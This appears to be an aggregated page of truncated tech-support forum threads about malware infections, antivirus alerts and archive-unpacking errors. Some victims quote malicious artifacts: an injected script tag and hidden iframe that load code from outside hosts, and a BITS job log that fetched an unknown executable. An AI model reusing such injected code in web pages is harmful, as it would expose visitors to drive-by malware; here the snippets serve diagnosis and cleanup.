Here's what I know: Computer was infected about 4-5 days ago after the user received a malicious email from a sender claiming to be UPS or Fedex. The email attachment claimed to have information about a package that would be dropped off or picked up (the user isn't sure which), and you needed to open and print the attached "receipt" to receive your package.

This installed one of the fake "security" suites that has been removed earlier this morning. I feel like there is still a rootkit hanging on somewhere, and aswMBR seemed to detect something pertaining to Microsoft Security Essentials (the entry was highlighted in RED) RIGHT before Windows bluescreened with an IRQ_NOT_LESS_OR_EQUAL error or something of the sort. Logs are attached below, and I eagerly await your advice. Nothing will be done until I am instructed to do so.

DDS.TXT is below, the other two are attached.

**EDIT: I also have a screenshot o... Read more

A:Infected - User opened UPS malicious email attachment

Greetings and Welcome back to The Forums!!Here are the things to keep in mind while I am helping you to make things go easier and faster for both of usPlease do not run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.Please do not attach logs or use code boxes, just copy and paste the text.
Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.Please read every post completely before doing anything.
Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.Please provide feedback about your experience as we go.
A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.NOTE: At the top of your post, click on the Watch Topic Button, select Immediate Notification, and cli... Read more

16 more replies
Answer Match 47.46%

Symantec Endpoint Protection pops up " [SID: 23793] HTTP Malicious RMF File detected " but it won't remove it. CPU usage is at 100%; svchost.exe using 90+%. Also gives "Generic Host Process for Win32 Services has encountered a problem and needs to close." after it sits idle for a while.

System restore did not resolve the problem. Malware Bytes Anti-Malware found two objects (probably unrelated) and removed them, but the problem persists. ComboFix didn't solve the problem either.

I know Symantec sucks but I work remotely and my company's VPN host-checker requires this exact version. I also just read that you don't recommend ComboFix but I didn't know that when I ran it, and it had worked for me one time a year or so ago when all else failed.

Any help would be greatly appreciated!

A:HTTP Malicious RMF File detected

New notification while sitting idle just now: [SID: 24225] Web Attack: Blackhole Toolkit Website 5 detected

Please help.

3 more replies
Answer Match 47.46%

message I'm getting is as follows
" malicious code found in file c:\system volume information\-restore{CD 53596A-5812-49DB-AF84-A72B9BECDE4F}\RP851\A0082311.oll.Infection:Trojan Downloader.Win32.zlob.meq
Action Failed.....

I have gone into my c drive , If I try to go into windows explorer from start, programs,accessories,windows explorer I am brought to my documents folder, explorer will not open. I have tried all I know how to with no luck in finding the file and removing it, It dosent show up when I run a system scan with my virus scan either, any suggestions would be greatly appreciated.

also, my system restore will no longer work, if I try to restore to a different time it goes through all the steps but then tells me that the restore could not be completed and no changes were made......help please
vampire265

A:Malicious Code Found In File

The infected RP***\A00*****.exe file(s) is in the System Volume Information Folder (SVI) which is a part of System Restore. This is the feature that allows you to set points in time to roll back your computer to a clean working state. The SVI folder is protected by permissions that only allow the system to have access and is hidden by default unless you have reconfigured Windows to show it. System Restore will back up the good as well as the bad files so when malware is present on the system it gets included in any restore points as an A00***** file. When you scan your system with anti-virus or anti-malware tools, you may receive an alert or notification that a virus was found in the SVI folder (System Restore points) but the anti-virus software was unable to remove it. Since the SVI folder is a protected directory, most scanning tools cannot access it to disinfect or delete these files. If not removed, they sometimes can reinfect your system if you accidentally use an old restore point.To remove these file(s), the easiest thing to do is Create a New Restore Point to enable your computer to "roll-back" to a clean working state and use Disk Cleanup to remove all but the most recent restore point.However, since System Restore is not working, you need to get that fixed.If System Restore is not working, check to make sure it is started and set to automatic.Go to Start > Run and type: services.mscLocate the System Restore Service and double-click it. Click the &q... Read more

7 more replies
Answer Match 47.46%

I am building heuristic engine as a hoby, what is fastest way to check if file is malware? What functions to detect, now I am using writeProcessMemory, SetWindowsHookEx, CreateToolhelp32Snapshot, OutputDebugString, OpenMutex, that is for the start, how can I improve it, regards?
 

A:What to check in file if it has malicious behaviour?

Check this out http://malwaretips.com/forums/malware-analysis-reports-help-and-questions.140/
 

2 more replies
Answer Match 47.46%

Last night at exactly 11PM PST two servers started writing out a large number of IIS logs to HTTPERR. Logging in to the server, a hidden iexplorer.exe would run and consume one CPU core, generating the following errors:
 
2013-02-25 07:23:31 127.0.0.1 1907 127.0.0.1 80 HTTP/1.0 GET /MicrosoftUpdate/ShellEX/KB48342708/default.aspx?tmp=YWZmaW5pdHllbWFpbA== 400 - BadRequest –
 
This ONLY brings up three google results ("MicrosoftUpdate/ShellEX") from sophos.com.
 
This would create multiple 1MB log files per minute. Killing the hidden IE session, nothing additional would come back on its own. I found in the Run registry key there was a string value named "mcupdate" that called c:\windows\system32\update.exe, a 40960 byte file. Running this file would make iexporer.exe open back up hidden and begin throwing errors once more. The date modified and create dates on both servers are from November 2011. Since nothing we have could detect update.exe as milcious, I submitted it to multiple online sites and none come back saying that the file is milciious. I can see in Process Monitor that it appears to be as the program then run tries to
 
With sophos installed (since they appeared to know something about the malware) and the file run in a virtual environment (it doesn't actually launch IE and generate errors here), process monitor shows update.exe writing to C:\Program Files\Sophos\Sophos Anti-Virus\SOPHOS_DETOURED.DLL. It did not do anything like this before ... Read more

More replies
Answer Match 47.46%

I noticed a command prompt running, it only stayed for a couple seconds before closing, in this time I checked task manager to see what it was - "bitsadmin.exe"

I checked Google and found a bit of info on this, it's how Microsoft distributes updates or whatnot.

I checked the Event Viewer and found these logs:

Code:
The BITS service created a new job: amijob, with owner PC\doko

BITS started the amijob transfer job that is associated with the hxxp://d17xr4aw9ok0me.cloudfront.net/Updater.exe URL.
(Changed http to hxxp as advised in the instructions topic)

The transfer job is complete.
User: PC\doko
Transfer job: amijob
Job ID: {bf7ab4ef-6ee1-485b-877c-e222c5a434c8}
Owner: PC\doko
File count: 1
I downloaded that Updater.exe file on a virtual machine to check it out, when executing it, it just closes again - not sure what it does and I'm not sure whether it's malicious.

I checked it with Virus Total:
https://www.virustotal.com/en/file/6...221b/analysis/

The only result is from Bkav with "HW32.Packed.980B", I can't find any information about this result on Google.

A:Malicious file downloaded through bitsadmin.exe ?

My dds.txt contained the following:

=============== Created Last 30 ================
.
2014-12-21 17:49:06 -------- d-----w- C:\Users\doko\AppData\Local\14524
Inside that folder is where the Updater.exe downloaded itself to, along with a 'status.cfg' file which doesn't contain anything and a 'Updater.xml' file which contains:

<?xml version="1.0" encoding="UTF-8"?>
<config>
<comp>
<scr xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="bin.base64">IA==</scr>
<name>DownloadManager</name>
<tp xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</tp>
<tu xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</tu>
<sv xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</sv>
<ti xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</ti>
<icp>campid=10526;</icp>
</comp>
<comp>
<scr xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="bin.base64">IA==</scr>
<name>updater</name>
<tp xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</tp>
<tu xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0... Read more

3 more replies
Answer Match 47.46%

I have the updated Kaspersky 2009 on my Windows XP sp2 and the scan is not able to detect the malicious javascript code which is exploiting my browsers. Sometimes, the websites does not load or give me a strange error.
Upon looking the source code, i found this malicious code:

Code:
<script language="javascript" SRC="http://do.qwertyy.cn/do.js"></script>
<iframe src="http://hosttracker.net/?click=22235703" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
This code has been inserted on all my browsers, websites and giving me sleepless nights.
I also tried deleting cookies everytime, but nothing works :-(
I also own few websites, where i am in the random process of uploading and downloading files through ftp, because of this virus, all my websites are also affected.
I have been searching a lot on internet for eliminating this virus but in vain.
Could you please help me out of what can i do to be safe?
 

More replies
Answer Match 47.04%

How do I unpack, but not install, SoftPaqs?













Solved!

View Solution.

A:FAQ(23): Unpacking downloaded SoftPaqs

You can unpack a SoftPaq by running it with a few command line switches.  To do this, open a Windows command box and refer to the following information:Unpacking a SoftPaq fileSp#####.exe ?pdf ?f<path> -s WhereSP####.exe is the Softpaq to unpack.-pdf is a run time switch that overrides the build parameters.-f<Path> is a run time switch that overrides the default path set at build time.-s instructs the package to unpack in silent mode skipping the welcome, license and directory screens.EXAMPLE:At the command box prompt (with Administrator rights to prevent access issues) go to the directory where the SoftPaq is and type the following: sp59909.exe -pdf -fC:\SWSetup\sp59909 -s

3 more replies
Answer Match 47.04%

I have just replaced my old desktop for a new one that comes with windows 7 64 bit. But not sure why ever since I started using the new desktop to unpack rars and especially rars with parts, both winrar and 7zip often have error messages like:

"Packed data CRC failed"
"The volume is corrupted"
"The file is corrupted"
etc.

For example, one of my family member who lives in Ireland wants to send me a bunch of videos and photos taken from a trip they went. He packed these bunch of files into three part rars and uploaded onto a file hosting website and so I have to download each one of them. I first tried jdownloader and downloaded them but couldn't unzip it. Then I tried to download in the normal way using firefox but still couldn't unpack. And I started to think is the pack corrupted?

But then I tried to use my netbook (with win7 32 bit starter os) and downloaded the files through this computer, it unpacked smoothly without a hassle. I then tried to copy the files I have downloaded using my new desktop to my netbook and try to unpack them there but again it saids the file is corrupted. That means somehow it's not winrar or 7zip's problem but the way my new computer writes the files into the hard disk creates corrupted files?

So what's wrong with my new computer? Even my old desktop won't have these problems. Is it because of the 32 64 bit difference? Perhaps my Ireland cousin packed the files with winrar 32 bit and i used 64 bit didn't work? Or ... Read more

A:Weird when unpacking rars

Win Rar can be installed in bot 32bit/64 versions have you installed the correct version for your system

6 more replies
Answer Match 47.04%

Whenever I download a large archive, whether it's 7z, RAR format or some bin format (that's unpacked via provided installer), I always have problems unpacking.

What happens is that, while extracting, I receive errors about some files that are corrupted and cannot be extracted. The FUNNY thing is, if I try to extract the same archive again it says some other file is corrupted while the one that was "corrupted on my first try now extracts properly. I don't know how is that even possible.

1) I know that the archives I download/get from friends are not corrupted, and I can trust those sources.
2) I've tried basically everything, like re-downloading, trying with numerous attempts, and updating the software I use (7z, Win RAR, or Daemon tools for those bin archives I mentioned).

Any help? Thanks,
VAO

A:I ALWAYS have problems unpacking files. Any help?

I'm wondering if your hard drive has some bad sectors. You might run a disk check program to see. Your drive manufacturer will probably have one.

7 more replies
Answer Match 46.62%

Hi.
 
I run a Windows 8 Core i3 64-bit machine (Windows Experience Index is 5.6).
 
For a couple of weeks since I installed it, MalwareBytes keeps blocking malicious websites continuously. It is scary because even when the computer is idle and there's no internet activity, MalwareBytes shows messages of blocking access to malicious websites. I have no clue where this activity coming from. Please help! Am I infected? The computer's been running decently but I am still scared. Along with MalwareBytes, I use Windows Defender as my main antivirus.
 
Do let me know if any other information is needed.

A:MalwareBytes blocks malicious website when computer is idle. Am I infected?

Malwarebytes Anti-Malware Malicious Website Blocking (IP Protection) is part of the Protection Module in the Pro version and works after it is enabled. When attempting to go to a potential malicious website, Malwarebytes will block the attempt and provide an alert. Notification that an IP address has been blocked does not necessarily mean the computer is infected. Some legitimate programs on your computer (i.e. iTunes, Instant Messenger client, P2P programs, web browsers) have access to the Internet and that action can trigger an IP alert if it tried to access a malicious IP address. These types of events are stored in the "protection-log". Your firewall should be able to give you a list of such programs so you can confirm if they are legitimate.IP Protection is also designed to block incoming connections it determines to be malicious. Botnets and Zombie computers scour the net, randomly scanning a block of IP addresses, searching for vulnerable ports - commonly probed ports and make repeated attempts to access them. Hackers use "port scanning", a popular reconnaissance technique, to search for vulnerable computers with open ports using IP addresses or a group of random IP address ranges so they can break in and install malicious programs. Malwarebytes is doing its job by blocking this kind of traffic and alerting you about these intrusion attempts which it stores in the "protection-log".More information about IP Protection can be found in the Malwarebytes Anti-Malware Malici... Read more

17 more replies
Answer Match 46.62%

A new PNG buffer overflow vulnerability has surfaced ... While this is most likely proof-of-concept, untrusted PNG formats should not be used in Photoshop until this issue is patched.Adobe Products PNG.8BI PNG File Handling Buffer Overflow http://secunia.com/advisories/25044/Marsu has discovered a vulnerability in various Adobe Products, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the PNG.8BI Photoshop Format Plugin when handling PNG files. This can be exploited to cause a stack-based buffer overflow via a specially crafted PNG file. Successful exploitation allows execution of arbitrary code.The vulnerability is confirmed in Adobe Photoshop CS2 and Adobe Photoshop Elements (Editor) version 5.0 for Windows and reportedly affects Adobe Photoshop CS3.

A:Adobe Photoshop - New Malicious Png File Vulnerabi

Buffer Overflows In Adobe Products

1 more replies
Answer Match 46.62%

C:\Program Files(x86)\Skype\toolbars\Skypetoolbars.msi|>fileIeaddonIconIco. B42772A4__1C26_462F_81FG_13E4A2E8DE85 Error 42127 CAB Archive is corrupted

C:\Program Files(x86)\Skype\toolbars\Skypetoolbars.msi|>fileIeaddonIconIcox64. B42772A4__1C26_462F_81FG_13E4A2E8DE85 Error 42127 CAB Archive is corrupted

C:\Windows\Installer\1078F.msi|>FileIeaddonIconIco.B42772A4__1C26_462F_81FG_13E4A2E8DE85 Error 42127 CAB Archive is corrupted

C:\Windows\Installer\1078F.msi|>FileIeaddonIconIcox64.B42772A4__1C26_462F_81FG_13E4A2E8DE85 Error 42127 CAB Archive is corrupted

These 4 Show up during the scan, are these anything to worry about?

A:Is this a malicious file that keeps showing up in avast bootscan?

Let me put it this way. If the anti virus I trusted kept showing these things as unwanted they would be gone. You can Google them and make a decision.
To help make a decision you could use this.
Windows Defender Offline

7 more replies
Answer Match 46.62%

Hello all. My internet explore has shut down displaying an error in the wscmp.dll file. I did an online search and have found that this is a sign of malicious files. I also keep recieving a message stating that...

"This system is shutting down. Please save all work in progress and log off. Any unsaved changes will be lost. This shutdown was initiated by NT AUTHORITY\SYSTEM."

It has a :60 timer and shuts down after the time has elapsed. I am not sure if the two are related.

I have tried to run the latest malware fix tool from Microsoft, but the tool shuts down on the same file everytime and the scan is not completed. This occurs even in Safe Mode.

Also, winupdate.exe and ieupdates.exe encounter an error when windows starts. Upon research I have found these are bad .exe files and I would very much like to get rid of them. Any help on any of these problems would be greatly appreciated. Thanks.

-----------------------------------------------

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:40:16 PM, on 12/5/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16544)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WIN... Read more

A:malicious .dll file found -- wscmp.dll -- Looking for help on a fix. Log in thread.

16 more replies
Answer Match 46.2%

Switched my web browser yesterday to MSNBC. Get an error message while in there "error while unpacking program, Code 2 Please report to author????????

More replies
Answer Match 46.2%

My problem is that if u wanna unpack an exe file, could be a setup exe., then it will save the data in the temp folder (Windows drive), and my problem is that i made a patision (or however to spell that in english.. ) so i got 10 gb for windows, so if my windows ****s up i will be able to just reinstall without worrying too much for my files. (Programs like registery mechanic will often solve the registery prob.) Anyways, this means i don't have enough space on my c-drive, as i should have given it more ofc.. Should have given it 15 instead, as my programs are on that drive aswel... anyways! thats not the matter.. the matter is that when some exe. files wants to extract they want to extract huge amounts of software before installing, im talking about 1,3 gb + here, and i cant get that much space without deleting half of my programs or so.. SO what i want to know, is there a way to manualy unpack an exe. file ? Or is there a way to change its unpacking destination, so it won't save in temp.. thanks for all upcomming answer.

- Hans, Denmark.

A:Hard times unpacking exe files.

Change the place where it unpacks to the other partition you have for files, programs etc. This should be on the extraction wizard.

2 more replies
Answer Match 46.2%

Hello, when I visit a website that has a video, my Avira antivirus gives me the following notification:
Virus or unwanted program 'HTML/Malicious.Flash.Gen [virus]' detected in file 'C:\Windows\temp\0000000E-E6DED9FD. Action performed: Deny access
my computer usually freezes up and is very slow for several seconds or until I x out of the page. The file in C drive it gives is different each time it gives the virus notification. I have run the following scans:
 
Avira, superantispyware, malwarbytes, lavasoft adaware, Spybot S&D, combofix, and others and I have uninstalled all java and flashplayer programs and then reinstalled.
 
but nothing helps. Can anyone give me a hand? Here are the DDS scan results:
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.16428  BrowserJavaVersion: 10.45.2
Run by Home PC at 10:35:11 on 2013-11-19
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.5617.3037 [GMT -5:00]
.
AV: Lavasoft Ad-Aware *Enabled/Updated* {445B48C3-0FA4-6B16-8F07-6506F305D800}
AV: Avira Desktop *Disabled/Updated* {F67B4DE5-C0B4-6C3F-0EFF-6C83BD5D0C2C}
SP: Avira Desktop *Disabled/Updated* {4D1AAC01-E68E-63B1-344F-57F1C6DA4691}
SP: Lavasoft Ad-Aware *Enabled/Updated* {FF3AA927-299E-6498-B5B7-5E74888292BD}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: COMODO Defense+ *Enabled/Updated* {FEEA52D5-051E-08DD-07EF-2F009097607D}
FW: COMODO Firewall *Enabled* {7DB03214-694B-060B-1600-BD47... Read more

A:HTML/Malicious.Flash.Gen [virus]' detected in file 'C:

Does no replies mean no one knows how to fix this issue?

3 more replies
Answer Match 46.2%

Hello, when I visit a website that has a video, my Avira antivirus gives me the following notification:
Virus or unwanted program 'HTML/Malicious.Flash.Gen [virus]' detected in file 'C:\Windows\temp\0000000E-E6DED9FD. Action performed: Deny access
my computer usually freezes up and is very slow for several seconds or until I x out of the page. The file in C drive it gives is different each time it gives the virus notification. I have run the following scans:
 
Avira, superantispyware, malwarbytes, lavasoft adaware, combofix, and I have uninstalled all java and flashplayer programs and then reinstalled.
 
but nothing helps. Can anyone give me a hand?

A:HTML/Malicious.Flash.Gen [virus]' detected in file...

Hello Jim be careful running Combo,Empty your temp folders using TFC (Temporary File Cleaner)Please download TFC by Old Timer and save it to your desktop.alternate download linkSave any unsaved work. (TFC will close ALL open programs including your browser!)Double-click on TFC.exe to run it. (If you are using Vista, right-click on the file and choose "Run As Administrator".)Click the Start button to begin the cleaning process and let it run uninterrupted to completion.Important! If TFC prompts you to reboot, please do so immediately. If not prompted, manually reboot the machine anyway allowing Windows to load normally (not into Safe Mode) to ensure a complete clean.Last run ESET.Hold down Control and click on this link to open ESET OnlineScan in a new window.Click the button.For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.Double click on the icon on your desktop.Check "YES, I accept the Terms of Use."Click the Start button.Accept any security warnings from your browser.Under scan settings, check "Scan Archives" and "Remove found threats" Click Advanced settings and select the following:Scan potentially unwanted applicationsScan for potentially unsafe applicationsEnable Anti-Stealth technologyESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.When the scan... Read more

3 more replies
Answer Match 45.78%

Morning Guys,
 
I have an old fully functioning notebook which is currently running the Windows XP Home Edition (2002). The notebook is still in working condition and I've recently decided to upgrade its RAM and OS.
However, a few days ago it was infected with a malicious virus which I'm certain is NOT in the OS but in the Master Boot Record. Reasons for deciding so include:
 
1. I've ran everything under the sun and there's no detection;
2. Internet connection is on in the system tray, but I'm barred from accessing any sites regardless of which browser I use (only page it allows is the microsoft page - the start up page on IE8);
3. I've uninstall some programmes (Firefox and Avast), but they are still present in the laptop;
4. My address bar in windows explorer is hidden even after I've put a tick to show it;
5. Every time immediately after I clicked on Shut down, my USB antivirus Real Time Protection notification bubble appears.
 
I am no expert when it comes to removing viruses, but I've been online searching for possible ways to remove this horror as I would like to upgrade my laptop to a newer OS. Even my USB is infected - the virus completely wiped out its content and planted itself in an invisible System Volume Information folder, which also denies access to anyone or anything that tries to remove it.
 
I really need some advice / help on getting rid of this. Obviously, I cannot download any software or use the USB ports. The only alternative is the... Read more

A:Master Boot Record Infected with Malicious Virus - Windows XP Home Edition

Since you are planning to upgrade to Windows 7......that would eliminate any malware on the hdd during formatting and installing 7.
If you suspect flash drives or other external drives are infected, be sure none are connected to the computer.
 
Another choice is using a Linux distro such as Ubuntu which is free.
If you want to explore using a Linux distro.....view topics in BC's Linux Forum or start your own there.

4 more replies
Answer Match 45.78%

First, thank your for taking the time to look at a and help solve my problem.

My sister was using my computer and she explained that she was browsing a website and the antivirus software began to display warnings and the computer suddenly rebooted. When I took a look at it myself, it was slower than usual upon booting, and I immediately began to get malicious sofware warnings from Avast. There were malicious url warnings and malicious file warnings and then the computer blue screened (I didnt get the error code from the blue screen because it closed too fast) and rebooted. I ran a scan in safe mode with Avast and Malwarebytes and they both found viruses. I scanned with Avast first and got these:
Avast scan results:

Filename: iyniiuda.dll - Threat: Win32:Sefnit-GS [Drp]

Filename: fprpbuai.dll - Threat: Win32:Sefnit-GT [Drp]

Filename: esevpji.dll - Threat: Win32:Sefnit-GS [Drp]

Filename: iyniiuda.dll - Threat: Win32:Sefnit-GS [Drp]

Filename: fprpbuai.dll - Threat: Win32:Sefnit-GT [Drp]

Filename: tzsfv.dll - Threat: Win32:Sefnit-GT [Drp]

Filename: partner[1].htm - Threat: HTML:RedirME-inf [Trj]

Filename: impressions[1].htm - Threat: HTML:RedirME-inf [Trj]


Malwarebytes found both of these:

Memory Processes Detected: 1
C:\Windows\svchost.exe (Trojan.Agent) -> 3744 -> Delete on reboot.

Files Detected: 1
C:\Windows\svchost.exe (Trojan.Agent) -> Delete on reboot.


After the scans, I tried moving the files to the chest (quarenteen) ... Read more

A:Infected with unknown virus. Avast detects malicious URL & Windows blue screens

Greetings and Welcome to The Forums!!My name is Gringo and I'll be glad to help you with your computer problems. I have put together somethings for you to keep in mind while I am helping you to make things go easier and faster for both of usPlease do not run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.Please do not attach logs or use code boxes, just copy and paste the text.
Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.Please read every post completely before doing anything.
Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.Please provide feedback about your experience as we go.
A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.NOTE: At... Read more

3 more replies
Answer Match 45.36%

I changed my os to win 7 64 bit, I'm trying to install microsoft 2010 office 64bit from an online link. it downloaded and goes to unpack when I get an error while it's checking crc. It stops and the error says insufficient disk space or errors on disk. I have 80gb free on my drive. and I cleaned the disk from previous installs. Stuck?? Please help

A:online install error in unpacking download while checking crc

Downloaded from what online link?

The last I heard, 32-bit was the recommended version even for 64-bit systems?

Choose the 32-bit or 64-bit version of Office - Word - Office.com

2 more replies
Answer Match 45.36%

Error while unpacking program, code LP5. Please report to author.

A:Error while unpacking program, code LP5. Please report to author.

You are going to have to provide a lot more detail in order for anyone to be able to answer your question. Please include as much information as you can in your posts.

2 more replies
Answer Match 45.36%

how do i stop this message from coming on my computer all the time?

Error while unpacking program, code 2. Please report to author.

A:Error while unpacking program, code 2. Please report to author.

was there a reply posted ?

[email protected]

2 more replies
Answer Match 45.36%

This help request might fit in alternate discussion threads, but this seems like the most logical place to post... these could be 2 separate issues, but it feels like they are connected to me.

Problem:
A - Unpacking any RAR, Zip, 7z, etc file - particularly large ones results in CRC or other unpacking errors 90% of the time. Sometimes a simple retry works, sometimes re-downloading the compressed file works.. sometimes nothing works. Anything over 1GB is almost sure to fail miserably every time (often fails on different files within the package.
(this occurs using winzip, winrar, 7zip)

B - Multiple game client crashes - Oblivion, Various MMORPG (WoW, LOTRO, many others) crash constantly.. if the computer doesn't freeze or blue screen, the error is 100% the client .exe file .. it doesn't happen just on strenuous load sequences or 'laggy' areas.. it can just happen sitting in the middle of an unpopulated area.. varies once per 1-5 hrs.. rarely goes 3 gameplay attempts without at least 1 crash.

Both errors have occured pretty consistently over the last 3 years.. i give up on some games that have more crashes than others.. and give up on some because i can never even unpack the game to play it.

Original System: Dell XPS 600 Purchased October 2005 .. problems started right away - but I just ignored most of them until after warranty

Hardware Replaced:
Video Card (6 mos ago).. was nvidia 7800 gtx, now nvidia 8600 i believe..
Hard Drive(3 mos ago) - was Maxtor... Read more

A:Constant Unpacking Errors and Game Client Crashes

sorry - i hate bumping - put posted this late last night - figure there are more people on the forums now that hopefully have some advice!

Thanks

4 more replies
Answer Match 45.36%

The captioned message appears whenever I try to update my antispyware application, so preventing it. When I stopped the firewall and runned a sfc /scannow and corrected 3 or 4 system files, it did open, but no more after reopening the firewall.

A:Error while unpacking program, code 2. Please report to author.

You may have other Spyware issues. First you can disable the Firewall. If the Spyware program opens then it has it's own Firewall that conflicts with Windows. You should also download CCleaner delete temp files, run Registry Cleaner too. Then download malwarebytes run full scan delete nasties.

9 more replies
Answer Match 45.36%

Hi guys, I have just recently upgrade my computer from Windows XP to Windows 7, but since then I haven't been able to install most games.

During installation, each game has a different error message but generally, the problem seems to lie in games that require unpacking large files, such as *.bin. For example, while trying to install Assassin's Creed 3, this message appeared:

An error occurred while unpacking: archive corrupted! Unarc.dll returned an error code: -7. ERROR: archive data corrupted(decompression failed)Click to expand...

or

Decompression failed with error code: -12. Bad CRC in the archive data0.binClick to expand...

Please help me, I'm going mad.

Computer's spec:

OS: Windows 7 Ultimate 64-bit (6.1, Build 7600)
Processor: Intel Core i5 CPU 750 @ 2.67GHz (4CPUs)
RAM: Elixir DDRam 3 2GB x2
GPU: ATI Radeon HD 4800 Series
DirectX 11
Motherboard: ASUS P7P55D
BIOS: 9/24/9 Ver: 08.00.15

What I've tried so far:

Updated drivers of graphic card, mainboard, etc.
Ran as Administrator.
Installed in safe mode.
Tried installing these games in another computer (everything's fine)
Reinstalled Windows 7.
Formatted entire HDD, reinstalled Windows XP (now even Windows XP has this problem)
Bought a new HDD

 

A:Cannot install softwares which require unpacking large files

what site are you downloading these from?
 

3 more replies
Answer Match 45.36%

While on the internet today, my internet security program  advised me that it had blocked a potential web attack: Malicious File Download Attack 24.  Looking at the log files in Norton, I can see the severity of the attack, but it says no action is required for Recommendation of action.  While doing a little research on my own, I can see that doesn't always mean something didn't find its way on my machine. It just happened, so there are no obvious signs of abnormal system performance going on.  How can I be sure?  Also, I've read through several fixes of similar issues on here where the user was advised to run ComboFix under the guidance of a technical adviser.  I would like to do the same.
 
System info:
 
Older XP machine with up to date patches and SP3
Running Norton Internet Security version 21.7.0.11 (up to date)
Running concurrently Malwarebytes version 2.1.8.1057 (up to date)
 
I've attached a screenshot of the potential intrusion, found in the NIS log file
 
Thank you so kindly,
 
Brian

A:Norton Internet Security prompted it block a Malicious File Download 24.

Hi there,my name is Marius and I will assist you with your malware related problems.Before we move on, please read the following points carefully. First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding. Perform everything in the correct order. Sometimes one step requires the previous one. If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem. Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me. Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts. If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed. Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean. My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.   Scan with FRST in normal modePlease download Farbar's Recovery Scan Tool to your desktop: FRST 32bit or FRST 64bit (If not sure: Start --> Computer (right click) --> properties)Run FRST. Don´t change one of the checkboxes and hit Scan. Logfiles are created on your desk... Read more

2 more replies
Answer Match 45.36%

As everyone knows, the condition of a computer will deteroriate over time.
Unfortunately, since I've had the internet working on my computer, my computer has been getting slower, and slower until now. It takes approx. 20 seconds - 1 minute to get from Windows Logon to the Explorer Shell, and about another 5 - 10 minutes fully loading. Internet Explorer crashes everytime I exit, and every app I have will frequently hang for a few seconds to a few hours.

HijackThis log as follows.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 21:10:11, on 16/12/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16762)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\UAService7.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\Program Files\Java\jre6\bin\jusched... Read more

More replies
Answer Match 41.58%

i have got a malicious file on my d drive, cant delete it, and antivirus do not count it as virus.
tried deleting it but "access denied"
so i want to know if i can delete that file without using any antivirus
